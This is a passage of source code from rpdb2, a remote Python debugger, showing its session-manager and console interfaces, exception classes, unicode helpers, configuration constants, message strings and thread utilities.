to temporary locking or even deadlocking.
"""
suite = as_unicode(suite, fstrict = True)
return self.__smi.execute(suite)
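#
# Editor's note: an illustrative sketch (not part of the original source); the
# expression and statement below are placeholders.
#
#   value_repr, warning, error = sm.evaluate('len(my_list)')
#   warning, error = sm.execute('my_list.append(42)')
#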
def complete_expression(self, expr):
"""
Return matching completions for expression.
Accepted expressions are of the form a.b.c
Dictionary lookups and function calls are not evaluated. For
example: 'getobject().complete' or 'dict[item].complete' are
not processed.
On the other hand partial expressions and statements are
accepted. For example: 'foo(arg1, arg2.member.complete' will
be accepted and the completion for 'arg2.member.complete' will
be calculated.
Completions are returned as a tuple of two items. The first item
is a prefix to expr and the second item is a list of completions.
For example if expr is 'foo(self.comp' the returned tuple can
be ('foo(self.', ['complete', 'completion', etc...])
"""
expr = as_unicode(expr, fstrict = True)
return self.__smi.complete_expression(expr)
def set_encoding(self, encoding, fraw = False):
"""
Set the encoding that will be used as source encoding for execute()
evaluate() commands and in strings returned by get_namespace().
The encoding value can be either 'auto' or any encoding accepted by
the codecs module. If 'auto' is specified, the encoding used will be
the source encoding of the active scope, which is utf-8 by default.
The default encoding value is 'auto'.
If fraw is True, strings returned by evaluate() and get_namespace()
will represent non ASCII characters as an escape sequence.
"""
return self.__smi.set_encoding(encoding, fraw)
def get_encoding(self):
"""
return the (encoding, fraw) tuple.
"""
return self.__smi.get_encoding()
def set_synchronicity(self, fsynchronicity):
"""
Set the synchronicity mode.
Traditional Python debuggers that use the inspected thread (usually
the main thread) to query or modify the script name-space have to
wait until the script hits a break-point. Synchronicity allows the
debugger to query and modify the script name-space even if its
threads are still running or blocked in C library code by using
special worker threads. In some rare cases querying or modifying data
with synchronicity on can crash the script. For example, in some Linux
builds of wxPython querying the state of wx objects from a thread
other than the GUI thread can crash the script. If this happens or
if you want to restrict these operations to the inspected thread,
turn synchronicity off.
On the other hand when synchronicity is off it is possible to
accidentally deadlock or block indefinitely the script threads by
querying or modifying particular data structures.
The default is on (True).
"""
return self.__smi.set_synchronicity(fsynchronicity)
def get_synchronicity(self):
return self.__smi.get_synchronicity()
def get_state(self):
"""
Get the session manager state. Return one of the STATE_* constants
defined below, for example STATE_DETACHED, STATE_BROKEN, etc...
"""
return self.__smi.get_state()
#
# REVIEW: Improve data strucutre.
#
def get_thread_list(self):
return self.__smi.get_thread_list()
def set_thread(self, tid):
"""
Set the focused thread to the specified thread.
tid - either the OS thread id or the zero based index of the thread
in the thread list returned by get_thread_list().
"""
return self.__smi.set_thread(tid)
def set_password(self, _rpdb2_pwd):
"""
Set the password that will govern the authentication and encryption
of client-server communication.
"""
_rpdb2_pwd = as_unicode(_rpdb2_pwd, fstrict = True)
return self.__smi.set_password(_rpdb2_pwd)
def get_password(self):
"""
Get the password that governs the authentication and encryption
of client-server communication.
"""
return self.__smi.get_password()
def get_encryption(self):
"""
Get the encryption mode. Return True if unencrypted connections are
not allowed. When launching a new debuggee the debuggee will inherit
the encryption mode. The encryption mode can be set via command-line
only.
"""
return self.__smi.get_encryption()
def set_remote(self, fAllowRemote):
"""
Set the remote-connections mode. if True, connections from remote
machine are allowed. When launching a new debuggee the debuggee will
inherit this mode. This mode is only relevant to the debuggee.
"""
return self.__smi.set_remote(fAllowRemote)
def get_remote(self):
"""
Get the remote-connections mode. Return True if connections from
remote machine are allowed. When launching a new debuggee the
debuggee will inherit this mode. This mode is only relevant to the
debuggee.
"""
return self.__smi.get_remote()
def set_environ(self, envmap):
"""
Set the environment variables mapping. This mapping is used
when a new script is launched to modify its environment.
Example for a mapping on Windows: [('Path', '%Path%;c:\\mydir')]
Example for a mapping on Linux: [('PATH', '$PATH:~/mydir')]
The mapping should be a list of tuples where each tuple is
composed of a key and a value. Keys and values must be either
strings or Unicode strings. Other types will raise the BadArgument
exception.
Invalid arguments will be silently ignored.
"""
return self.__smi.set_environ(envmap)
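#
# Editor's note: an illustrative sketch (not part of the original source),
# using the placeholder directory from the examples above.
#
#   if os.name == 'nt':
#       sm.set_environ([('Path', '%Path%;c:\\mydir')])
#   else:
#       sm.set_environ([('PATH', '$PATH:~/mydir')])
#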
def get_environ(self):
"""
Return the current environment mapping.
"""
return self.__smi.get_environ()
def stop_debuggee(self):
"""
Stop the debuggee immediately.
"""
return self.__smi.stop_debuggee()
class CConsole:
"""
Interface to a debugger console.
"""
def __init__(
self,
session_manager,
stdin = None,
stdout = None,
fSplit = False
):
"""
Constructor of CConsole
session_manager - session manager object.
stdin, stdout - redirection for IO.
fSplit - Set this flag to True when input and output belong to different
panes. For example take a look at Winpdb.
"""
self.m_ci = CConsoleInternal(
session_manager,
stdin,
stdout,
fSplit
)
def start(self):
return self.m_ci.start()
def join(self):
"""
Wait until the console ends.
"""
return self.m_ci.join()
def set_filename(self, filename):
"""
Set current filename for the console. The current filename can change
from outside the console when the console is embedded in other
components, for example take a look at Winpdb.
"""
filename = as_unicode(filename)
return self.m_ci.set_filename(filename)
def complete(self, text, state):
"""
Return the next possible completion for 'text'.
If a command has not been entered, then complete against command list.
Otherwise try to call complete_<command> to get list of completions.
"""
text = as_unicode(text)
return self.m_ci.complete(text, state)
def printer(self, text):
text = as_unicode(text)
return self.m_ci.printer(text)
#
# ---------------------------- Exceptions ----------------------------------
#
class CException(Exception):
"""
Base exception class for the debugger.
"""
def __init__(self, *args):
Exception.__init__(self, *args)
class BadMBCSPath(CException):
"""
Raised on Windows systems when the python executable or debugger script
path can not be encoded with the file system code page. This means that
the Windows code page is misconfigured.
"""
class NotPythonSource(CException):
"""
Raised when an attempt to load non-Python source is made.
"""
class InvalidScopeName(CException):
"""
Invalid scope name.
This exception might be thrown when a request was made to set a breakpoint
to an unknown scope.
"""
class BadArgument(CException):
"""
Bad Argument.
"""
class ThreadNotFound(CException):
"""
Thread not found.
"""
class NoThreads(CException):
"""
No Threads.
"""
class ThreadDone(CException):
"""
Thread Done.
"""
class DebuggerNotBroken(CException):
"""
Debugger is not broken.
This exception is thrown when an operation that can only be performed
while the debuggee is broken, is requested while the debuggee is running.
"""
class InvalidFrame(CException):
"""
Invalid Frame.
This exception is raised if an operation is requested on a stack frame
that does not exist.
"""
class NoExceptionFound(CException):
"""
No Exception Found.
This exception is raised when exception information is requested, but no
exception is found, or has been thrown.
"""
class CConnectionException(CException):
def __init__(self, *args):
CException.__init__(self, *args)
class FirewallBlock(CConnectionException):
"""Firewall is blocking socket communication."""
class BadVersion(CConnectionException):
"""Bad Version."""
def __init__(self, version):
CConnectionException.__init__(self)
self.m_version = version
def __str__(self):
return repr(self.m_version)
class UnexpectedData(CConnectionException):
"""Unexpected data."""
class AlreadyAttached(CConnectionException):
"""Already Attached."""
class NotAttached(CConnectionException):
"""Not Attached."""
class SpawnUnsupported(CConnectionException):
"""Spawn Unsupported."""
class UnknownServer(CConnectionException):
"""Unknown Server."""
class CSecurityException(CConnectionException):
def __init__(self, *args):
CConnectionException.__init__(self, *args)
class UnsetPassword(CSecurityException):
"""Unset Password."""
class EncryptionNotSupported(CSecurityException):
"""Encryption Not Supported."""
class EncryptionExpected(CSecurityException):
"""Encryption Expected."""
class DecryptionFailure(CSecurityException):
"""Decryption Failure."""
class AuthenticationBadData(CSecurityException):
"""Authentication Bad Data."""
class AuthenticationFailure(CSecurityException):
"""Authentication Failure."""
class AuthenticationBadIndex(CSecurityException):
"""Authentication Bad Index."""
def __init__(self, max_index = 0, anchor = 0):
CSecurityException.__init__(self)
self.m_max_index = max_index
self.m_anchor = anchor
def __str__(self):
return repr((self.m_max_index, self.m_anchor))
#
#----------------- unicode handling for compatibility with py3k ----------------
#
def is_py3k():
return sys.version_info[0] >= 3
def is_unicode(s):
if is_py3k() and type(s) == str:
return True
if type(s) == unicode:
return True
return False
def as_unicode(s, encoding = 'utf-8', fstrict = False):
if is_unicode(s):
return s
if fstrict:
u = s.decode(encoding)
else:
u = s.decode(encoding, 'replace')
return u
def as_string(s, encoding = 'utf-8', fstrict = False):
if is_py3k():
if is_unicode(s):
return s
if fstrict:
e = s.decode(encoding)
else:
e = s.decode(encoding, 'replace')
return e
if not is_unicode(s):
return s
if fstrict:
e = s.encode(encoding)
else:
e = s.encode(encoding, 'replace')
return e
def as_bytes(s, encoding = 'utf-8', fstrict = True):
if not is_unicode(s):
return s
if fstrict:
b = s.encode(encoding)
else:
b = s.encode(encoding, 'replace')
return b
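#
# Editor's note: an illustrative sketch (not part of the original source) of
# the helpers above on Python 3; the sample string is a placeholder.
#
#   u = as_unicode('café')    # already text, returned unchanged
#   b = as_bytes(u)           # utf-8 encoded bytes: b'caf\xc3\xa9'
#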
#
#----------------------- Infinite List of Globals ---------------------------
#
#
# According to PEP-8: "Use 4 spaces per indentation level."
#
PYTHON_TAB_WIDTH = 4
GNOME_DEFAULT_TERM = 'gnome-terminal'
NT_DEBUG = 'nt_debug'
SCREEN = 'screen'
MAC = 'mac'
DARWIN = 'darwin'
POSIX = 'posix'
#
# Map between OS type and relevant command to initiate a new OS console.
# entries for other OSs can be added here.
# '%s' serves as a place holder.
#
# Currently there is no difference between 'nt' and NT_DEBUG, since now
# both of them leave the terminal open after termination of debuggee to
# accommodate scenarios of scripts with child processes.
#
osSpawn = {
'nt': 'start "rpdb2 - Version ' + get_version() + ' - Debuggee Console" cmd.exe /K ""%(exec)s" %(options)s"',
NT_DEBUG: 'start "rpdb2 - Version ' + get_version() + ' - Debuggee Console" cmd.exe /K ""%(exec)s" %(options)s"',
POSIX: "%(term)s -e %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
'Terminal': "Terminal --disable-server -x %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
GNOME_DEFAULT_TERM: "gnome-terminal --disable-factory -x %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
MAC: '%(exec)s %(options)s',
DARWIN: '%(exec)s %(options)s',
SCREEN: 'screen -t debuggee_console %(exec)s %(options)s'
}
RPDBTERM = 'RPDBTERM'
COLORTERM = 'COLORTERM'
TERM = 'TERM'
KDE_PREFIX = 'KDE'
GNOME_PREFIX = 'GNOME'
KDE_DEFAULT_TERM_QUERY = "kreadconfig --file kdeglobals --group General --key TerminalApplication --default konsole"
XTERM = 'xterm'
RXVT = 'rxvt'
RPDB_SETTINGS_FOLDER = '.rpdb2_settings'
RPDB_PWD_FOLDER = os.path.join(RPDB_SETTINGS_FOLDER, 'passwords')
RPDB_BPL_FOLDER = os.path.join(RPDB_SETTINGS_FOLDER, 'breakpoints')
RPDB_BPL_FOLDER_NT = 'rpdb2_breakpoints'
MAX_BPL_FILES = 100
EMBEDDED_SYNC_THRESHOLD = 1.0
EMBEDDED_SYNC_TIMEOUT = 5.0
HEARTBEAT_TIMEOUT = 16
IDLE_MAX_RATE = 2.0
PING_TIMEOUT = 4.0
LOCAL_TIMEOUT = 1.0
COMMUNICATION_RETRIES = 5
WAIT_FOR_BREAK_TIMEOUT = 3.0
SHUTDOWN_TIMEOUT = 4.0
STARTUP_TIMEOUT = 3.0
STARTUP_RETRIES = 3
LOOPBACK = '127.0.0.1'
LOCALHOST = 'localhost'
SERVER_PORT_RANGE_START = 51000
SERVER_PORT_RANGE_LENGTH = 24
SOURCE_EVENT_CALL = 'C'
SOURCE_EVENT_LINE = 'L'
SOURCE_EVENT_RETURN = 'R'
SOURCE_EVENT_EXCEPTION = 'E'
SOURCE_STATE_UNBROKEN = '*'
SOURCE_BP_ENABLED = 'B'
SOURCE_BP_DISABLED = 'D'
SYMBOL_MARKER = '>'
SYMBOL_ALL = '*'
SOURCE_MORE = '+'
SOURCE_LESS = '-'
SOURCE_ENTIRE_FILE = '^'
CONSOLE_PRINTER = '*** '
CONSOLE_WRAP_INDEX = 78
CONSOLE_PROMPT = '\n> '
CONSOLE_PROMPT_ANALYZE = '\nAnalyze> '
CONSOLE_INTRO = ("""RPDB2 - The Remote Python Debugger, version %s,
Copyright (C) 2005-2009 Nir Aides.
Type "help", "copyright", "license", "credits" for more information.""" % (RPDB_VERSION))
PRINT_NOTICE_PROMPT = "Hit Return for more, or q (and Return) to quit:"
PRINT_NOTICE_LINES_PER_SECTION = 20
STR_NO_THREADS = "Operation failed since no traced threads were found."
STR_STARTUP_NOTICE = "Attaching to debuggee..."
STR_SPAWN_UNSUPPORTED = "The debugger does not know how to open a new console on this system. You can start the debuggee manually with the -d flag on a separate console and then use the 'attach' command to attach to it."
STR_SPAWN_UNSUPPORTED_SCREEN_SUFFIX = """Alternatively, you can use the screen utility and invoke rpdb2 in screen mode with the -s command-line flag as follows:
screen rpdb2 -s some-script.py script-arg1 script-arg2..."""
STR_AUTOMATIC_LAUNCH_UNKNOWN = STR_SPAWN_UNSUPPORTED
STR_STARTUP_SPAWN_NOTICE = "Starting debuggee..."
STR_KILL_NOTICE = "Stopping debuggee..."
STR_STARTUP_FAILURE = "Debuggee failed to start in a timely manner."
STR_OUTPUT_WARNING = "Textual output will be done at the debuggee."
STR_OUTPUT_WARNING_ASYNC = "The operation will continue to run in the background."
STR_ANALYZE_GLOBALS_WARNING = "In analyze mode the globals and locals dictionaries are read only."
STR_BREAKPOINTS_LOADED = "Breakpoints were loaded."
STR_BREAKPOINTS_SAVED = "Breakpoints were saved."
STR_BREAKPOINTS_SAVE_PROBLEM = "A problem occurred while saving the breakpoints."
STR_BREAKPOINTS_LOAD_PROBLEM = "A problem occurred while loading the breakpoints."
STR_BREAKPOINTS_NOT_SAVED = "Breakpoints were not saved."
STR_BREAKPOINTS_NOT_LOADED = "Breakpoints were not loaded."
STR_BREAKPOINTS_FILE_NOT_FOUND = "Breakpoints file was not found."
STR_BREAKPOINTS_NOT_FOUND = "No Breakpoints were found."
STR_BAD_FILENAME = "Bad File Name."
STR_SOME_BREAKPOINTS_NOT_LOADED = "Some breakpoints were not loaded, because of an error."
STR_BAD_EXPRESSION = "Bad expression '%s'."
STR_FILE_NOT_FOUND = "File '%s' not found."
STR_DISPLAY_ERROR = """If the X server (Windowing system) is not started you need to use rpdb2 with the screen utility and invoke rpdb2 in screen mode with the -s command-line flag as follows:
screen rpdb2 -s some-script.py script-arg1 script-arg2..."""
STR_EXCEPTION_NOT_FOUND = "No exception was found."
STR_SCOPE_NOT_FOUND = "Scope '%s' not found."
STR_NO_SUCH_BREAKPOINT = "Breakpoint not found."
STR_THREAD_NOT_FOUND = "Thread was not found."
STR_NO_THREADS_FOUND = "No threads were found."
STR_THREAD_NOT_BROKEN = "Thread is running."
STR_THREAD_FOCUS_SET = "Focus was set to chosen thread."
STR_ILEGAL_ANALYZE_MODE_ARG = "Argument is not allowed in analyze mode. Type 'help analyze' for more info."
STR_ILEGAL_ANALYZE_MODE_CMD = "Command is not allowed in analyze mode. Type 'help analyze' for more info."
STR_ANALYZE_MODE_TOGGLE = "Analyze mode was set to: %s."
STR_BAD_ARGUMENT = "Bad Argument."
STR_BAD_SYNTAX = 'Unknown syntax: %s\nDid you forget to use the exec or eval console commands?'
STR_PSYCO_WARNING = "The psyco module was detected. The debugger is incompatible with the psyco module and will not function correctly as long as the psyco module is imported and used."
STR_CONFLICTING_MODULES = "The modules %s, which are incompatible with the debugger, were detected and can possibly cause the debugger to fail."
STR_SIGNAL_INTERCEPT = "The signal %s(%d) was intercepted inside debugger tracing logic. It will be held pending until the debugger continues. Any exceptions raised by the handler will be ignored!"
STR_SIGNAL_EXCEPTION = "Exception %s raised by handler of signal %s(%d) inside debugger tracing logic was ignored!"
STR_DEBUGGEE_TERMINATED = "Debuggee has terminated."
STR_DEBUGGEE_NOT_BROKEN = "Debuggee has to be waiting at break point to complete this command."
STR_DEBUGGER_HAS_BROKEN = "Debuggee is waiting at break point for further commands."
STR_ALREADY_ATTACHED = "Already attached. Detach from debuggee and try again."
STR_NOT_ATTACHED = "Not attached to any script. Attach to a script and try again."
STR_COMMUNICATION_FAILURE = "Failed to communicate with debugged script."
STR_ERROR_OTHER = "Command returned the following error:\n%(type)s, %(value)s.\nPlease check stderr for stack trace and report to support."
STR_BAD_MBCS_PATH = "The debugger can not launch the script since the path to the Python executable or the debugger scripts can not be encoded into the default system code page. Please check the settings of 'Language for non-Unicode programs' in the Advanced tab of the Windows Regional and Language Options dialog."
STR_LOST_CONNECTION = "Lost connection to debuggee."
STR_FIREWALL_BLOCK = "A firewall is blocking the local communication channel (socket) that is required between the debugger and the debugged script. Please make sure that the firewall allows that communication."
STR_BAD_VERSION = "A debuggee was found with incompatible debugger version %(value)s."
STR_BAD_VERSION2 = "While attempting to find the specified debuggee, at least one debuggee was found that uses an incompatible version of RPDB2."
STR_UNEXPECTED_DATA = "Unexpected data received."
STR_ACCESS_DENIED = "While attempting to find debuggee, at least one debuggee denied connection because of mismatched passwords. Please verify your password."
STR_ACCESS_DENIED2 = "Communication is denied because of mismatched passwords."
STR_ENCRYPTION_EXPECTED = "While attempting to find debuggee, at least one debuggee denied connection since it accepts encrypted connections only."
STR_ENCRYPTION_EXPECTED2 = "Debuggee will only talk over an encrypted channel."
STR_DECRYPTION_FAILURE = "Bad packet was received by the debuggee."
STR_DEBUGGEE_NO_ENCRYPTION = "Debuggee does not support encrypted mode. Either install the python-crypto package on the debuggee machine or allow unencrypted connections."
STR_RANDOM_PASSWORD = "Password has been set to a random password."
STR_PASSWORD_INPUT = "Please type a password:"
STR_PASSWORD_CONFIRM = "Password has been set."
STR_PASSWORD_NOT_SUPPORTED = "The --pwd flag is only supported on NT systems."
STR_PASSWORD_MUST_BE_SET = "A password should be set to secure debugger client-server communication."
STR_BAD_DATA = "Bad data received from debuggee."
STR_BAD_FILE_DATA = "Bad data received from file."
STR_ATTACH_FAILED = "Failed to attach"
STR_ATTACH_FAILED_NAME = "Failed to attach to '%s'."
STR_ATTACH_CRYPTO_MODE = "Debug Channel is%s encrypted."
STR_ATTACH_CRYPTO_MODE_NOT = " NOT"
STR_ATTACH_SUCCEEDED = "Successfully attached to '%s'."
STR_ATTEMPTING_TO_STOP = "Requesting script to stop."
STR_ATTEMPTING_TO_DETACH = "Detaching from script..."
STR_DETACH_SUCCEEDED = "Detached from script."
STR_DEBUGGEE_UNKNOWN = "Failed to find script."
STR_MULTIPLE_DEBUGGEES = "WARNING: There is more than one debuggee '%s'."
MSG_ERROR_HOST_TEXT = """The debugger was not able to set the host to '%s'.
The following error was returned:
%s"""
STR_SOURCE_NOT_FOUND = "Failed to get source from debuggee."
STR_SCRIPTS_CONNECTING = "Connecting to '%s'..."
STR_SCRIPTS_NO_SCRIPTS = "No scripts to debug on '%s'"
STR_SCRIPTS_TO_DEBUG = """Scripts to debug on '%s':
pid name
--------------------------"""
STR_STACK_TRACE = """Stack trace for thread %d:
Frame File Name Line Function
------------------------------------------------------------------------------"""
STR_SOURCE_LINES = """Source lines for thread %d from file '%s':
"""
STR_ACTIVE_THREADS = """List of active threads known to the debugger:
No Tid Name State
-----------------------------------------------"""
STR_BREAKPOINTS_LIST = """List of breakpoints:
Id State Line Filename-Scope-Condition-Encoding
------------------------------------------------------------------------------"""
STR_BREAKPOINTS_TEMPLATE = """ %2d %-8s %5d %s
%s
%s
%s"""
STR_ENCRYPTION_SUPPORT_ERROR = "Encryption is not supported since the python-crypto package was not found. Either install the python-crypto package or allow unencrypted connections."
STR_PASSWORD_NOT_SET = 'Password is not set.'
STR_PASSWORD_SET = 'Password is set to: "%s"'
STR_PASSWORD_BAD = 'The password should begin with a letter and continue with any combination of digits, letters or underscores (\'_\'). Only English characters are accepted for letters.'
STR_ENCRYPT_MODE = 'Force encryption mode: %s'
STR_REMOTE_MODE = 'Allow remote machines mode: %s'
STR_ENCODING_MODE = 'Encoding is set to: %s'
STR_ENCODING_MODE_SET = 'Encoding was set to: %s'
STR_ENCODING_BAD = 'The specified encoding was not recognized by the debugger.'
STR_ENVIRONMENT = 'The current environment mapping is:'
STR_ENVIRONMENT_EMPTY = 'The current environment mapping is not set.'
STR_SYNCHRONICITY_BAD = "Can not process command when thread is running unless synchronicity mode is turned on. Type 'help synchro' at the command prompt for more information."
STR_SYNCHRONICITY_MODE = 'The synchronicity mode is set to: %s'
STR_TRAP_MODE = 'Trap unhandled exceptions mode is set to: %s'
STR_TRAP_MODE_SET = "Trap unhandled exceptions mode was set to: %s."
STR_FORK_MODE = "Fork mode is set to: %s, %s."
STR_FORK_MODE_SET = "Fork mode was set to: %s, %s."
STR_LOCAL_NAMESPACE_WARNING = 'Debugger modifications to the original bindings of the local namespace of this frame will be committed before the execution of the next statement of the frame. Any code using these variables executed before that point will see the original values.'
STR_WARNING = 'Warning: %s'
STR_MAX_NAMESPACE_WARNING_TITLE = 'Namespace Warning'
STR_MAX_NAMESPACE_WARNING_TYPE = '*** WARNING ***'
STR_MAX_NAMESPACE_WARNING_MSG = 'Number of items exceeds capacity of namespace browser.'
STR_MAX_EVALUATE_LENGTH_WARNING = 'Output length exceeds maximum capacity.'
FORK_CHILD = 'child'
FORK_PARENT = 'parent'
FORK_MANUAL = 'manual'
FORK_AUTO = 'auto'
ENCRYPTION_ENABLED = 'encrypted'
ENCRYPTION_DISABLED = 'plain-text'
STATE_ENABLED = 'enabled'
STATE_DISABLED = 'disabled'
BREAKPOINTS_FILE_EXT = '.bpl'
PYTHON_FILE_EXTENSION = '.py'
PYTHONW_FILE_EXTENSION = '.pyw'
PYTHONW_SO_EXTENSION = '.so'
PYTHON_EXT_LIST = ['.py', '.pyw', '.pyc', '.pyd', '.pyo', '.so']
MODULE_SCOPE = '?'
MODULE_SCOPE2 = '<module>'
BLENDER_SOURCE_NOT_AVAILABLE = as_unicode('Blender script source code is not available.')
SOURCE_NOT_AVAILABLE = as_unicode('Source code is not available.')
SCOPE_SEP = '.'
BP_FILENAME_SEP = ':'
BP_EVAL_SEP = ','
DEBUGGER_FILENAME = 'rpdb2.py'
THREADING_FILENAME = 'threading.py'
STR_STATE_BROKEN = 'waiting at break point'
STATE_BROKEN = 'broken'
STATE_RUNNING = 'running'
STATE_ANALYZE = 'analyze'
STATE_DETACHED = 'detached'
STATE_DETACHING = 'detaching'
STATE_SPAWNING = 'spawning'
STATE_ATTACHING = 'attaching'
DEFAULT_NUMBER_OF_LINES = 20
DICT_KEY_TID = 'tid'
DICT_KEY_STACK = 'stack'
DICT_KEY_CODE_LIST = 'code_list'
DICT_KEY_CURRENT_TID = 'current tid'
DICT_KEY_BROKEN = 'broken'
DICT_KEY_BREAKPOINTS = 'breakpoints'
DICT_KEY_LINES = 'lines'
DICT_KEY_FILENAME = 'filename'
DICT_KEY_FIRST_LINENO = 'first_lineno'
DICT_KEY_FRAME_LINENO = 'frame_lineno'
DICT_KEY_EVENT = 'event'
DICT_KEY_EXPR = 'expr'
DICT_KEY_NAME = 'name'
DICT_KEY_REPR = 'repr'
DICT_KEY_IS_VALID = 'fvalid'
DICT_KEY_TYPE = 'type'
DICT_KEY_SUBNODES = 'subnodes'
DICT_KEY_N_SUBNODES = 'n_subnodes'
DICT_KEY_ERROR = 'error'
RPDB_EXEC_INFO = as_unicode('rpdb_exception_info')
MODE_ON = 'ON'
MODE_OFF = 'OFF'
ENCODING_UTF8_PREFIX_1 = '\xef\xbb\xbf'
ENCODING_SOURCE = '# -*- coding: %s -*-\n'
ENCODING_AUTO = as_unicode('auto')
ENCODING_RAW = as_unicode('raw')
ENCODING_RAW_I = as_unicode('__raw')
MAX_EVALUATE_LENGTH = 256 * 1024
MAX_NAMESPACE_ITEMS = 1024
MAX_SORTABLE_LENGTH = 256 * 1024
REPR_ID_LENGTH = 4096
MAX_NAMESPACE_WARNING = {
DICT_KEY_EXPR: STR_MAX_NAMESPACE_WARNING_TITLE,
DICT_KEY_NAME: STR_MAX_NAMESPACE_WARNING_TITLE,
DICT_KEY_REPR: STR_MAX_NAMESPACE_WARNING_MSG,
DICT_KEY_IS_VALID: False,
DICT_KEY_TYPE: STR_MAX_NAMESPACE_WARNING_TYPE,
DICT_KEY_N_SUBNODES: 0
}
MAX_EVENT_LIST_LENGTH = 1000
EVENT_EXCLUDE = 'exclude'
EVENT_INCLUDE = 'include'
INDEX_TABLE_SIZE = 100
DISPACHER_METHOD = 'dispatcher_method'
CONFLICTING_MODULES = ['psyco', 'pdb', 'bdb', 'doctest']
XML_DATA = """<?xml version='1.0'?>
<methodCall>
<methodName>dispatcher_method</methodName>
<params>
<param>
<value><string>%s</string></value>
</param>
</params>
</methodCall>""" % RPDB_COMPATIBILITY_VERSION
N_WORK_QUEUE_THREADS = 8
DEFAULT_PATH_SUFFIX_LENGTH = 55
ELLIPSIS_UNICODE = as_unicode('...')
ELLIPSIS_BYTES = as_bytes('...')
ERROR_NO_ATTRIBUTE = 'Error: No attribute.'
g_server_lock = threading.RLock()
g_server = None
g_debugger = None
g_fScreen = False
g_fDefaultStd = True
#
# In debug mode errors and tracebacks are printed to stderr
#
g_fDebug = False
#
# Lock for the traceback module to prevent it from interleaving
# output from different threads.
#
g_traceback_lock = threading.RLock()
g_source_provider_aux = None
g_lines_cache = {}
g_initial_cwd = []
g_error_mapping = {
socket.error: STR_COMMUNICATION_FAILURE,
CConnectionException: STR_LOST_CONNECTION,
FirewallBlock: STR_FIREWALL_BLOCK,
BadVersion: STR_BAD_VERSION,
UnexpectedData: STR_UNEXPECTED_DATA,
SpawnUnsupported: STR_SPAWN_UNSUPPORTED,
UnknownServer: STR_DEBUGGEE_UNKNOWN,
UnsetPassword: STR_PASSWORD_MUST_BE_SET,
EncryptionNotSupported: STR_DEBUGGEE_NO_ENCRYPTION,
EncryptionExpected: STR_ENCRYPTION_EXPECTED,
DecryptionFailure: STR_DECRYPTION_FAILURE,
AuthenticationBadData: STR_ACCESS_DENIED,
AuthenticationFailure: STR_ACCESS_DENIED,
BadMBCSPath: STR_BAD_MBCS_PATH,
AlreadyAttached: STR_ALREADY_ATTACHED,
NotAttached: STR_NOT_ATTACHED,
DebuggerNotBroken: STR_DEBUGGEE_NOT_BROKEN,
NoThreads: STR_NO_THREADS,
NoExceptionFound: STR_EXCEPTION_NOT_FOUND,
}
#
# These globals are related to handling the os.fork() os._exit() and exec
# pattern.
#
g_forkpid = None
g_forktid = None
g_fignorefork = False
g_exectid = None
g_execpid = None
g_fos_exit = False
#
# To hold a reference to __main__ to prevent its release if an unhandled
# exception is raised.
#
g_module_main = None
g_found_conflicting_modules = []
g_fignore_atexit = False
g_ignore_broken_pipe = 0
#
# Unicode version of path names that do not encode well with the Windows
# 'mbcs' encoding. This dict is used to work with such path names on
# Windows.
#
g_found_unicode_files = {}
g_frames_path = {}
g_signal_handlers = {}
g_signals_pending = []
#g_profile = None
g_fFirewallTest = True
if is_py3k():
g_safe_base64_to = bytes.maketrans(as_bytes('/+='), as_bytes('_-#'))
g_safe_base64_from = bytes.maketrans(as_bytes('_-#'), as_bytes('/+='))
else:
g_safe_base64_to = string.maketrans(as_bytes('/+='), as_bytes('_-#'))
g_safe_base64_from = string.maketrans(as_bytes('_-#'), as_bytes('/+='))
g_alertable_waiters = {}
g_builtins_module = sys.modules.get('__builtin__', sys.modules.get('builtins'))
#
# ---------------------------- General Utils ------------------------------
#
def job_wrapper(event, foo, *args, **kwargs):
try:
#print_debug('Thread %d doing job %s' % (thread.get_ident(), foo.__name__))
foo(*args, **kwargs)
finally:
event.set()
def send_job(tid, timeout, foo, *args, **kwargs):
#
# Attempt to send job to thread tid.
# Will throw KeyError if thread tid is not available for jobs.
#
(lock, jobs) = g_alertable_waiters[tid]
event = threading.Event()
f = lambda: job_wrapper(event, foo, *args, **kwargs)
jobs.append(f)
try:
lock.acquire()
lock_notify_all(lock)
finally:
lock.release()
safe_wait(event, timeout)
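#
# alertable_wait() registers the calling thread in g_alertable_waiters so
# that other threads can post jobs to it with send_job() while it waits on
# the given lock. Queued jobs are executed in the waiting thread's context
# once the wait returns.
#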
def alertable_wait(lock, timeout = None):
jobs = []
tid = thread.get_ident()
g_alertable_waiters[tid] = (lock, jobs)
try:
safe_wait(lock, timeout)
while len(jobs) != 0:
job = jobs.pop(0)
try:
job()
except:
pass
if len(jobs) == 0:
time.sleep(0.1)
finally:
del g_alertable_waiters[tid]
def safe_wait(lock, timeout = None):
#
# Workaround for a Windows bug where signal handlers might raise
# exceptions even if they return normally.
#
while True:
try:
t0 = time.time()
return lock.wait(timeout)
except:
if timeout == None:
continue
timeout -= (time.time() - t0)
if timeout <= 0:
return
#
# The following code is related to the ability of the debugger
# to work both on Python 2.5 and 3.0.
#
def lock_notify_all(lock):
try:
if is_py3k():
return lock.notify_all()
except AttributeError:
pass
return lock.notifyAll()
def event_is_set(event):
try:
if is_py3k():
return event.is_set()
except AttributeError:
pass
return event.isSet()
def thread_set_daemon(thread, fdaemon):
try:
if is_py3k():
return thread.set_daemon(fdaemon)
except AttributeError:
pass
return thread.setDaemon(fdaemon)
def thread_is_alive(thread):
try:
if is_py3k():
return thread.is_alive()
except AttributeError:
pass
return thread.isAlive()
def thread_set_name(thread, name):
try:
if is_py3k():
return thread.set_name(name)
except AttributeError:
pass
return thread.setName(name)
def thread_get_name(thread):
try:
if is_py3k():
return thread.get_name()
except AttributeError:
pass
return thread.getName()
def current_thread():
try:
if is_py3k():
return threading.current_thread()
except AttributeError:
pass
return threading.currentThread()
class _stub_type:
pass
def _rpdb2_bytes(s, e):
return s.encode(e)
if not hasattr(g_builtins_module, 'unicode'):
unicode = _stub_type
if not hasattr(g_builtins_module, 'long'):
long = _stub_type
if not hasattr(g_builtins_module, 'str8'):
str8 = _stub_type
if not hasattr(g_builtins_module, 'bytearray'):
bytearray = _stub_type
if not hasattr(g_builtins_module, 'bytes'):
bytes = _stub_type
#
# Pickle on Python 2.5 should know how to handle byte strings
# that arrive from Python 3.0 over sockets.
#
g_builtins_module.bytes = _rpdb2_bytes
if is_py3k():
class sets:
Set = _stub_type
BaseSet = _stub_type
ImmutableSet = _stub_type
if sys.version_info[:2] <= (2, 3):
set = sets.Set
def _raw_input(s):
